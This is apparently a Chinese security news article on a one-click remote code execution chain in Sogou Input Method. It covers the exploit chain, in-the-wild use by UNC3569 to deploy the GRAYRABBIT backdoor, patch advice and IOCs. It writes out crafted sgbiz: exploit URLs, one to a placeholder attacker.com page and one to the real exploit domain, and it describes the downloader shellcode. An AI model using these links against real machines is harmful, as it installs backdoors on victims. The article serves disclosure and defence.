文章总结: Gen发现搜狗输入法远程代码执行漏洞CVE-2026-51990,利用链串联sgbiz协议参数注入、皮肤中心webview任意URL导航及无沙箱的Chromium80旧内核,点击构造链接即可植入后门;UNC3569组织已在野利用部署GRAYRABBIT后门。腾讯已在16.3.0.3498版修复,建议用户尽快更新,文中附攻击链技术解析与IOC清单。
综合评分: 82
文章分类: 漏洞分析,威胁情报,恶意软件,漏洞预警,终端安全
别乱点!你电脑里的搜狗输入法曾曝“点一下链接就中招”漏洞
原创
404号浪漫
404号浪漫
404号浪漫
2026年9月16日 13:06
北京
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
0x01 核心速览
| | |
| — | — |
| 【事件】 | 【事件】 |
| Gen Threat Labs 发现 Sogou Input Method 中存在一个关键远程代码执行漏洞 CVE-2026-51990。该漏洞将 sgbiz: 自定义协议处理器中的未校验命令行参数注入、基于 CEF 的 webview 无限制 URL 导航,以及严重过时且无沙箱的 Chromium 浏览器引擎串联为单次点击利用。 | Sogou Input Method 是 Windows 上广泛使用的中文输入法之一,安装量达数亿。该漏洞已被 UNC3569 威胁组织在野利用,通过构造链接部署 GRAYRABBIT 后门。腾讯已修复该漏洞。 |
注意:经确认搜狗五笔输入法不受影响
0x02 正文解读
2.1-事件发现与确认
Gen Threat Labs 在例行调查一次 UNC3569 入侵时,将初始访问来源追溯到 Sogou Input Method 的进程链。该发现最终导向一个关键远程代码执行漏洞,攻击者只需诱使用户点击一个构造链接,即可在运行该软件的机器上静默打开后门。该团队将漏洞报告给 Tencent,后者在后续更新中修复,漏洞被分配为 CVE-2026-51990。
2.2-攻击面:sgbiz: 协议与 biz_helper.exe
Sogou Input Method 由多个组件构成,并通过 Windows 上注册的自定义协议方案 sgbiz: 通信。当用户、网页或任意应用打开 sgbiz: URL 时,Windows 将其交给协议处理器 biz_helper.exe。该二进制解析 URL,并将请求分发到相应 Sogou 组件。典型 URL 形如:sgbiz:sg_process?module=sgmyinput.exe¶m=-page=skincenter其中,URL 路径告诉 biz_helper.exe 使用哪个处理器,查询参数提供要启动的可执行文件、参数、工作目录等信息。
2.3-漏洞一:biz_helper.exe 中未校验的参数注入
当biz_helper.exe 收到带 sg_process 命令的 sgbiz: URL 时,会提取五个参数:module、param、work_dir、start_mode、start_show。module 参数会接受较严格的安全检查:扫描禁止字符(\ / : * ? ” < > |)以阻止路径遍历,执行 MAX_PATH 长度限制,将名称解析到 Sogou 安装目录,并调用 GetFileAttributesW 确认目标文件存在且不是目录。但 param 参数没有获得任何校验。它从 URL 提取后仅经过一次 URL 解码(mbdup 函数),随后被直接、未经修改地作为命令行参数传给 module 指向的可执行文件。没有清理、没有允许列表、没有过滤。这意味着攻击者可以向任何可通过 sg_process 处理器启动的 Sogou 可执行文件注入任意命令行参数。
2.4-漏洞二:SGMyInput.exe 中无限制 URL 导航
攻击者构造的URL以SGMyInput.exe为目标,并传入参数,例如:
sgbiz:sg_process?module=sgmyinput.exe¶m= -page%3Dskincenter%20-url%3Dhttps%253A%252F%252Fattacker.com%252Fexploit.html
URL 解码后,param 值变为:
-page=skincenter -url=https://attacker.com/exploit.html
-page 参数决定 SGMyInput.exe 初始化哪个 UI 模块。多数页面类型会创建原生 Win32 配置对话框,但 skincenter 页面不同:它是皮肤市场,会创建 CEF webview 显示皮肤商店,是 SGMyInput.exe 中唯一实例化浏览器的代码路径。当 webview 就绪后,SkinCenterWebViewEvent::OnWebViewIsReady 会检查是否通过 -url 命令行参数提供了自定义 URL。如果存在,函数会复制该 URL 并让浏览器直接导航。这里没有 scheme 检查,http、https、file、data、javascript 均可接受;没有域名允许列表,也没有任何验证。攻击者控制的 URL 因此从 biz_helper.exe 流经 SGMyInput.exe,进入 CEF 浏览器并导航到任意位置。
2.5-漏洞三:2020 年版 CEF,且无沙箱运行
Sogou Input Method 的嵌入式浏览器由 CEF 提供,实际渲染在独立进程 SGWebRender.exe 中进行。SGWebRender.exe 是薄启动器,其 WinMain 构造 SGMiniBrowserHelperHost1.0.0.8.dll 路径,通过 LoadLibraryExW 加载,并解析 GetBrowserManagerInstance 导出。该函数返回浏览器管理器单例,其 Run 方法在 DLL 内触发 CEF 初始化。
该 DLL 捆绑的 libcef.dll 标识为 CEF 80.1.16,Chromium 80.0.3987.163,时间约为 2020 年 3 月,比分析时当前 Chromium 稳定版落后约 60 个主要版本。更严重的是,PopulateCefSettings 函数在 CefSettings 结构中显式设置 no_sandbox 为 TRUE,完全禁用 Chromium 沙箱。ConfigureCefCommandLineSwitches 回调还追加了一系列进一步削弱保护的开关:disable-web-security、allow-file-access-from-files、disable-gpu-shader-disk-cache、enable-direct-write、disable-spell-checking。
其中 disable-web-security 和 allow-file-access-from-files 由 CefApp 对象中的 bDisableWebSecurity 字段控制,但 SGWebRender.exe 初始化浏览器管理器时将该标志硬编码为 1。它不是运行时开关或配置选项,而是始终开启。disable-web-security 尤其危险:即使没有完整浏览器漏洞,禁用同源策略也意味着该 webview 中加载的任意页面都可以向内部网络服务发起已认证请求、读取响应并外泄数据。结合无沙箱环境,利用条件被显著降低。
2.6-完整攻击链
2.7-在野利用:UNC3569 与 GRAYRABBIT后门
UNC3569 是 Google Threat Intelligence 记录的 PRC-nexus 威胁组织,优先追求运营效率,经常利用广泛使用软件中的 n-day 漏洞,并维护包含自定义恶意软件和商业工具的多样化工具集。该组织曾针对全球政府、教育、技术和金融部门开展网络行动,重点集中在东亚和东南亚。值得注意的是,UNC3569 与 i-SOON 存在潜在业务关系;i-SOON 是一家中国私营承包商公司,其内部通信在 2024 年初被泄露。关于 UNC3569 行动的全面分析,见 Google 研究人员发布的 Virus Bulletin 2024 论文 “Down the GRAYRABBIT Hole: Exposing UNC3569 and Its Modus Operandi”。
在观察到的活动中,攻击者向受害者投递了以下 URL:
sgbiz:sg_process?module=sgmyinput.exe¶m=-page%3Dskincenter%20-url%3Dhttps%253A%252F%252Fnoht1ng.top%252Ffuckujjbangx.html
noht1ng[.]top 上的利用页面提供了针对 CVE-2021-38003 的 JavaScript 利用。该漏洞是 JSON.stringify 中的 V8 类型混淆漏洞,影响 Chrome 95.0.4638.69 之前的版本。Sogou 捆绑的 Chromium 版本为 80,因此该 CVE 以及此后 60 多个主要版本间的数十个其他漏洞均可生效。
2.8-载荷:下载、侧加载与反沙箱
利用包含嵌入的 x64 位置无关 shellcode(921 字节),作为下载器。Shellcode 使用经典 call/pop 技术定位自身基址,遍历 PEB 的 InLoadOrderModuleList,通过匹配模块名的 ROR8 哈希定位 kernel32.dll;通过导出名哈希解析 LoadLibraryW,加载 Urlmon.dll,并解析 URLDownloadToFileA。
Shellcode 从位于 8.218.50[.]207(Alibaba Cloud,Hong Kong)的暂存服务器获取三个文件:
2.9-GRAYRABBIT 后门与 C2
加密载荷是两阶段包:0xC7 字节位置无关 shellcode 桩 + 单字节 XOR 加密的 GRAYRABBIT PE(0x42800 字节)。这种“短解密器桩 + 单字节 XOR PE + 调用 CoreClientInstall”的格式,是 Google Threat Intelligence 自至少 2021 年以来记录的 UNC3569 标准 GRAYRABBIT 投递格式。
桩通过 call/pop 定位基址,加 0xBF 找到加密数据起点(文件偏移 0xC7),用密钥 0x33 XOR 解密 PE;随后用 RVA 到文件偏移转换遍历导出目录,按序号定位第一个导出 CoreClientInstall,并以解密 PE 基址调用。解密后的 PE 是 GRAYRABBIT x64 变体:UNC3569 多年用作一阶段植入的轻量级 C++ 后门,内部模块名 core.dll,导出 CoreClientInstall(反射加载入口)和 CoreClientStart(主 RAT 循环)。这些导出名、C2 协议和 beacon 格式是 GRAYRABBIT 的定义标识;x64 变体是 x86 版的成熟化,差异包括字节操作编码 C2 域名和扩展命令集。
#
0x03 动作指引
3.1-更新与补丁
建议所有 Sogou Input Method 用户尽快更新到最新版本。Tencent 已通过自动更新部署修复,版本为 16.3.0.3498。该修复阻止了通过外部协议处理器传入攻击者控制 URL 的已观察利用路径。
遗留风险:补丁未改动 CEF 配置与 libcef 版本:SGWebRender.exe 和 SGMiniBrowserHelperHost DLL 中 no_sandbox 仍为 1,bDisableWebSecurity 仍为 1,disable-web-security 等不安全标志仍被追加,浏览器仍无沙箱、安全控制被剥离。仅因 biz_helper.exe 新增输入验证,攻击者控制的 URL 不再能通过外部协议处理器到达该组件。
3.2-IOC 附录
文件哈希(SHA256):
| | | |
| — | — | — |
| 文件 | SHA256 | 说明 |
| 7zp.dll | 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63 | 木马化 DLL 加载器,内部名 boy.dll |
| p | 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e | 加密 PE 加载器 shellcode |
| GRAYRABBIT backdoor | D7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a | GRAYRABBIT 后门,内部名 core.dll |
IOC:
| | |
| — | — |
| IOC | 说明 |
| mail.uaiubifas[.]top | GRAYRABBIT C2 域名(端口 443,原始 TCP,RC4 加密) |
| noht1ng[.]top | 利用页面托管域名 |
| 8.218.50[.]207 | 暂存服务器(Alibaba Cloud,Hong Kong) |
0x04 参考链接
1.Gen-Digital原文:https://www.gendigital.com/blog/insights/research/one-click-backdoor-sogou
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:404号浪漫 404号浪漫
404号浪漫《别乱点!你电脑里的搜狗输入法曾曝“点一下链接就中招”漏洞》